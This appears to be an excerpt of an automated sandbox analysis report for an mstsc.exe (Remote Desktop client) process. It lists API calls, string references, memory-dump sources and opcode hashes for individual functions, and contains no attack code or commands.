• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ButtonCheck
• String ID:
• API String ID: 83588225-0
• Opcode ID: 320b9ecf7f3d0e45e2a6c2782bf8f576c13def4e1d32bdf155f488854405932e
• Instruction ID: 209b819cab7a9e99837cf026cacf515e03d777a47a438eca96557e7d2826ca6a
• Opcode Fuzzy Hash: 320b9ecf7f3d0e45e2a6c2782bf8f576c13def4e1d32bdf155f488854405932e
• Instruction Fuzzy Hash: 810188B27706147BEF055E09DCC2D773A5EEF883207154166F900DE2D5CEA9DE218A50
APIs
• timeGetTime.WINMM ref: 0095199D
• timeKillEvent.WINMM(?), ref: 009519B0
• SetWindowPos.USER32(?,00000000,?,?,?,?,?), ref: 009519CD
• PostMessageW.USER32 ref: 009519DC
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0095198A,?), ref: 009519E3
• SetWindowPos.USER32(?,00000000,?,?,?,?,?), ref: 00951A15
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Windowtime$??3@EventKillMessagePostTime
• String ID:
• API String ID: 2170417897-0
• Opcode ID: 6de0df93daa67d7b1fcef96075eab01f24291c4b984520cbd7e24e0ff1672c9b
• Instruction ID: 0c86970a3b4caa6b0378744810eed9871d440609e99586fc47e3b1f655d893f6
• Opcode Fuzzy Hash: 6de0df93daa67d7b1fcef96075eab01f24291c4b984520cbd7e24e0ff1672c9b
• Instruction Fuzzy Hash: 66114C72114600FFDB219FA5DC09F6ABBBAFB0C311F104A0DF68692560CB72B810EB54
APIs
• GetDC.USER32(?), ref: 0093B940
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 0093B952
• RealizePalette.GDI32(00000000), ref: 0093B95C
• UpdateColors.GDI32(00000000,?,?,?,0091FF75,?), ref: 0093B963
• SelectPalette.GDI32(00000000,?,00000000), ref: 0093B974
• ReleaseDC.USER32(?,00000000), ref: 0093B97E
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Palette$Select$ColorsRealizeReleaseUpdate
• String ID:
• API String ID: 1468195242-0
• Opcode ID: a8c62a3ca99c4754dff9d4a5ee5b8a3ec1f1367d18fafcd874ed42097f67f134
• Instruction ID: b9d99d4a008a78e59d527065bb3cf03ca9807279a7e3247acdd74da1a8a2161c
• Opcode Fuzzy Hash: a8c62a3ca99c4754dff9d4a5ee5b8a3ec1f1367d18fafcd874ed42097f67f134
• Instruction Fuzzy Hash: 63F049B2129614BBC7215F65DC0CFAABBACFF46759F058129F609C2510CBB1E911DBE0
APIs
  • Part of subcall function 00920AC3: GetClientRect.USER32(?,00000006,?,?,00000000,00000006,00000000,?), ref: 00920AE1
  • Part of subcall function 00920AC3: RedrawWindow.USER32(?,00000006,00000000,00000045), ref: 00920AF9
• GetLastError.KERNEL32(?,00000400,00000000,?,?,?,0091E364,00000000,00000006,00000000,?), ref: 00920483
• GetLastError.KERNEL32(?,00000400,00000000,?,?,?,0091E364,00000000,00000006,00000000,?), ref: 009205E9
• GetLastError.KERNEL32(?,00000400,?,00000400,00000000,?,?,?,0091E364,00000000,00000006,00000000,?), ref: 0092064E
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 0091D87E: TraceMessage.ADVAPI32(?,00000000,0000002B,00908AB4,00000028,00000000,00000004,NULL,0000000A,0094BF7D,00000004,00000000,00000000,00000000,80070000,00000028), ref: 0091D8F1
  • Part of subcall function 00921012: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00921050
  • Part of subcall function 00921012: memset.MSVCRT ref: 0092107C
  • Part of subcall function 00921012: SendMessageW.USER32(?,0000104B,00000000,?), ref: 009210C3
  • Part of subcall function 00921012: lstrcmpiW.KERNEL32(?,?,?,?,?), ref: 009210D5
  • Part of subcall function 009145D2: _vsnwprintf.MSVCRT ref: 00914604
• ShellMessageBoxW.SHLWAPI ref: 009206BB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Message$ErrorLast$Send$AddressClientFreeHandleLibraryModuleProcRectRedrawShellTraceWindow_vsnwprintflstrcmpimemset
• String ID: StringCchPrintf failed
• API String ID: 2650913945-1082955989
• Opcode ID: 5234cbec165d16b74a8ae2ee82465c5d32f172d2679c858661987ed73ba088ba
• Instruction ID: 7b9dba31b35054756615ef3b38ecbcb04774fe6464d8b65c180c0f2476fbfed4
• Opcode Fuzzy Hash: 5234cbec165d16b74a8ae2ee82465c5d32f172d2679c858661987ed73ba088ba
• Instruction Fuzzy Hash: 92912F712083006FDB29DF14E889F6A73AEABD9308F14440DF605AB6E7C676DC519B12
APIs
• wcsstr.MSVCRT ref: 0092F42E
• wcschr.MSVCRT ref: 0092F443
• GetModuleHandleW.KERNEL32(00000000,00000000,000036C5), ref: 0092F4A4
Strings
• cookie=, xrefs: 0092F428
• Attempted override of sensitive settings for signed file, xrefs: 0092F4D1
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: HandleModulewcschrwcsstr
• String ID: Attempted override of sensitive settings for signed file$cookie=
• API String ID: 2156438982-3397407268
• Opcode ID: 6c0e8d54fb548387b7fbcc4bfa0f787ddd196cceb780fdbb4ab3b8c05f5823cc
• Instruction ID: b69016eb60efef3c0b7112afd1c95f0aa5d90c750fc13cb268e27421f33ca355
• Opcode Fuzzy Hash: 6c0e8d54fb548387b7fbcc4bfa0f787ddd196cceb780fdbb4ab3b8c05f5823cc
• Instruction Fuzzy Hash: 9B81A3745007148FDB29EF25E4A46E677FAFB88340B18857EEC4A8B259D774A880CF64
APIs
• SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0091F3B4
• memset.MSVCRT ref: 0091F3DB
• GetLastError.KERNEL32(?,00000100), ref: 0091F3FE
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Message$AddressErrorFreeHandleLastLibraryModuleProcSendTracememset
• String ID: AddRemoteApplicationToQueueUi failed!$SetAppIDAndDisablePinning failed!
• API String ID: 2233238036-2972087449
• Opcode ID: 016834e843025eae7264aaa64a482c54dfbd5ffd29b3fbe1313f3356e939f93d
• Instruction ID: 662a0ff6294f68ef8d6cbfecde6ce6bc1ce0d19b84d4029f36cd7f591edaa6c6
• Opcode Fuzzy Hash: 016834e843025eae7264aaa64a482c54dfbd5ffd29b3fbe1313f3356e939f93d
• Instruction Fuzzy Hash: 2461BF7130834D6FD71ADF60D969FB277AAAB84308F14006DF9019B1A2CA71ECC2EB51
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 0094DB88
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0094DBFA
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0094DCB0
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 0094D76F: TraceMessage.ADVAPI32(?,?,0000002B,00908C04,?,00000000,00000004,NULL,0000000A,NULL,0000000A,0094DC4D,00000004,00000000,?,00000000), ref: 0094D835
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: AddressCloseFreeHandleLibraryMessageModuleOpenProcQueryTraceValue
• String ID: SOFTWARE\Microsoft\Terminal Server Client\%s$\
• API String ID: 2288772661-3337323198
APIs
  • Part of subcall function 009145D2: _vsnwprintf.MSVCRT ref: 00914604
• RegOpenKeyExW.ADVAPI32 ref: 0094D9AD
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0094DA82
• RegCloseKey.ADVAPI32(?), ref: 0094DA93
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: CloseEnumOpenValue_vsnwprintf
• String ID: SOFTWARE\Microsoft\Terminal Server Client\%s$\
• API String ID: 143769899-3337323198
APIs
• CredUIPromptForWindowsCredentialsW.CREDUI(00000014,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 0094B19F
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0094B1B0
  • Part of subcall function 0094B603: LsaConnectUntrusted.SECUR32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0094B61C
  • Part of subcall function 0094B603: LsaDeregisterLogonProcess.SECUR32(00000000), ref: 0094B6D0
• memcpy.MSVCRT(00000000,?,00000000), ref: 0094B1C7
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
• CoTaskMemFree.OLE32(?), ref: 0094B227
Strings
• GetAuthenticationPackageId failed!, xrefs: 0094B14D
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Free$AddressAllocConnectCredCredentialsDeregisterHandleLibraryLocalLogonMessageModuleProcProcessPromptTaskTraceUntrustedWindowsmemcpy
• String ID: GetAuthenticationPackageId failed!
• API String ID: 2033552025-2246485560
APIs
  • Part of subcall function 00950BC7: GetDlgItem.USER32(00000000,?), ref: 00950BD8
  • Part of subcall function 00950BC7: EnableWindow.USER32(00000000,750BDBF5), ref: 00950BE6
• SendDlgItemMessageW.USER32(?,00003345,000000F1,00000000,00000000,00003346,?,750BDBF5,?,?,?,00000000,?,00000000), ref: 0093C288
• SendDlgItemMessageW.USER32(?,0000334A,00000144,00000000,00000000,?,00000000,?), ref: 0093C2B5
• SendDlgItemMessageW.USER32(?,0000334A,0000014E,?,00000000,?,00907260,00907240,00000002,?,?,00000000,?), ref: 0093C336
• SetDlgItemTextW.USER32(?,00003348,00000000,00907248,00000002,00000000,?,00000000), ref: 0093C364
Strings
• AddStringToComboBox failed!, xrefs: 0093C394
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Item$MessageSend$EnableTextWindow
• String ID: AddStringToComboBox failed!
• API String ID: 3122374576-2926826431
APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,009339E2,?,00000000,?,0091569A,?), ref: 009182C5
  • Part of subcall function 00923BBC: memset.MSVCRT ref: 00923C13
Strings
• QI for IID_IMsRdpClientNonScriptable4 failed!, xrefs: 00918327
• ApplyTSWASettings failed!, xrefs: 009183BF
• ApplyRDPSigningSettings failed!, xrefs: 00918379
• StartRemoteApplication failed, xrefs: 00918404
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: HandleModulememset
• String ID: ApplyRDPSigningSettings failed!$ApplyTSWASettings failed!$QI for IID_IMsRdpClientNonScriptable4 failed!$StartRemoteApplication failed
• API String ID: 1044559590-403600509
APIs
• wcstok_s.MSVCRT ref: 00956130
  • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ActivityControlEventwcstok_s
• String ID: Field in SignScope not found in store$RecordToString failed$SignScope$SignScope field not found in store
• API String ID: 1933954927-1973409768
APIs
• memset.MSVCRT ref: 0095EAB3
• BeginPaint.USER32(?,00000000), ref: 0095EAC0
• GetLastError.KERNEL32 ref: 0095EACA
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
• EndPaint.USER32(?,00000000), ref: 0095EB85
Strings
• ForwardMessageToControl failed, xrefs: 0095EB56
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Paint$AddressBeginErrorFreeHandleLastLibraryMessageModuleProcTracememset
• String ID: ForwardMessageToControl failed
• API String ID: 2462654298-2091418350
                                                                                                                                                                                    • Opcode ID: bd4fedf9fa8f9eb32bc9901afef1edc552fe4c36c96431f11931858c367d6deb
                                                                                                                                                                                    • Instruction ID: e88c75ef9b3a59a57e42f109ef2f724eeba43ea1e75a596fc4228db67354f41d
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd4fedf9fa8f9eb32bc9901afef1edc552fe4c36c96431f11931858c367d6deb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E312632A04318AFD729DF97CC85F6A7BB9AB45362F000549FC02A72A1C771ED05DB91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0230EA22
                                                                                                                                                                                      • Part of subcall function 022E13CB: ___swprintf_l.LIBCMT ref: 022E146B
                                                                                                                                                                                      • Part of subcall function 022E13CB: ___swprintf_l.LIBCMT ref: 022E1490
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 022E156D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                                                                    • Opcode ID: 76e51f14c2cdfb48b5cb9de888c1cca1c07c29b1587b9ebc15a94056e0150ef8
                                                                                                                                                                                    • Instruction ID: 07527fac2e9674884dc437ae7a0dc9d9ae60c89f406611e45bad24d216c2fa97
                                                                                                                                                                                    • Opcode Fuzzy Hash: 76e51f14c2cdfb48b5cb9de888c1cca1c07c29b1587b9ebc15a94056e0150ef8
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB21B4729206199BDF20DE98CC40AEA73BDAF14704F844561FD4BD3148DB70AEA88BE0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TraceMessage.ADVAPI32(?,0092E339,0000002B,0092E339,?,?,00000004,NULL,0000000A,NULL,0000000A,00000000,MRU0,00000000,Default,0092E339), ref: 00926AC4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageTrace
                                                                                                                                                                                    • String ID: <NULL>$Default$MRU0$NULL
                                                                                                                                                                                    • API String ID: 471583391-1578344839
                                                                                                                                                                                    • Opcode ID: 1054881b3b65f474e76a5d69d05e0c3f6b6505e82e2b0f7af44b5c0eb67ead1d
                                                                                                                                                                                    • Instruction ID: 2e27f1166dd3a27903b8f1604da5378e094dc3d2f4fc4b9f344c64ed88640188
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1054881b3b65f474e76a5d69d05e0c3f6b6505e82e2b0f7af44b5c0eb67ead1d
                                                                                                                                                                                    • Instruction Fuzzy Hash: E6213836A01215ABCF34DF58EC40ABF7B79EB80700F24C42AE905AB948E2709E91C790
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                                                                    • Opcode ID: a8d099d247b2ad38f7250c9b1302f04202cc6ff381014dfa23274660aa4563c4
                                                                                                                                                                                    • Instruction ID: 3c5780215b8c5bc48b005e8db0b7fde820a9a2658c695d8844925c761140621c
                                                                                                                                                                                    • Opcode Fuzzy Hash: a8d099d247b2ad38f7250c9b1302f04202cc6ff381014dfa23274660aa4563c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: F821C87390122AABDB20AE65CC449EF77EDEF04714F1405A5FD0597150EB70AA84CBE1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CertFindExtension.CRYPT32(2.5.29.37,?,?), ref: 00964303
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 00964378
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CertExtensionFindFreeLocal
                                                                                                                                                                                    • String ID: 2.5.29.37
                                                                                                                                                                                    • API String ID: 2896064161-3842544949
                                                                                                                                                                                    • Opcode ID: edf16d1c93e5f5288bae73f7800ba9204378c5b49f6e1cc43e707c9d50aaea3f
                                                                                                                                                                                    • Instruction ID: 634008055c2d4e408c84a7f9afac96436c57a03bbdda8ebbca4312be224f1767
                                                                                                                                                                                    • Opcode Fuzzy Hash: edf16d1c93e5f5288bae73f7800ba9204378c5b49f6e1cc43e707c9d50aaea3f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3021DE76600224EFCB109FD4CD45EAEBBA9EF88760B118059F9458B361EB708D10DBA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,0000000F,00000000,?), ref: 0094A45A
                                                                                                                                                                                      • Part of subcall function 0094A2F3: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?), ref: 0094A325
                                                                                                                                                                                      • Part of subcall function 0094A2F3: RegQueryValueExA.ADVAPI32 ref: 0094A366
                                                                                                                                                                                      • Part of subcall function 0094A2F3: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0094A385
                                                                                                                                                                                      • Part of subcall function 0094A2F3: RegCloseKey.ADVAPI32(?), ref: 0094A3AB
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,?), ref: 0094A413
                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(hhctrl.ocx,?,?,00000000,?), ref: 0094A430
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                                                                                                                    • String ID: hhctrl.ocx$mstsc.chm
                                                                                                                                                                                    • API String ID: 1060647816-3096909771
                                                                                                                                                                                    • Opcode ID: 35cc59490074eab3f1aba83399d6b67badfb2bf7b8a587d3affb69fb2bdc9b3a
                                                                                                                                                                                    • Instruction ID: 532b94aeefe6a2e193a5211fa4448ad2cb80b937a59edc61bf15207261c5660a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 35cc59490074eab3f1aba83399d6b67badfb2bf7b8a587d3affb69fb2bdc9b3a
                                                                                                                                                                                    • Instruction Fuzzy Hash: FE118F71758205AFEB24DFA5EC19F7A73ECAB58704F00402DE852D66A0FBF49C40AB12
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: Advapi32.dll$EventActivityIdControl
                                                                                                                                                                                    • API String ID: 4061214504-2884944642
                                                                                                                                                                                    • Opcode ID: ad97ca4ddc40af58ec529f4d1f149edc21e9ca6325e1d4a7e61c958efe1cf5ad
                                                                                                                                                                                    • Instruction ID: dbcc083eaab9b3fe279ad7b375d5f85513af55b0ad869c88de1ce414829ebb64
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad97ca4ddc40af58ec529f4d1f149edc21e9ca6325e1d4a7e61c958efe1cf5ad
• Instruction Fuzzy Hash: A4F03131B5420DAFDB10DFE4DD16ABFB7B8EB98701F400068FA45E6190DA70AE459B52
APIs
• LoadLibraryW.KERNEL32(Ntdll.dll,?,?,009161DC), ref: 0091617B
• FreeLibrary.KERNEL32(00000000,?,?,009161DC), ref: 00916199
• GetProcAddress.KERNEL32(WinSqmAddToStream,?,?,009161DC), ref: 009161A6
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Ntdll.dll$WinSqmAddToStream
• API String ID: 145871493-93134304
• Opcode ID: fb29f5549188f827646c5883bb938c7867cd90428c319858693fbd19619fc7f7
• Instruction ID: 6824464bcc3b44798be1b157b55ec25b2fe150ea4e7f6aa3acadd3f98084d813
• Opcode Fuzzy Hash: fb29f5549188f827646c5883bb938c7867cd90428c319858693fbd19619fc7f7
• Instruction Fuzzy Hash: C5F06571B28222AF9B31477AAC1445775A9DFD1B61315407DF444D2235DFB0DC41EF92
APIs
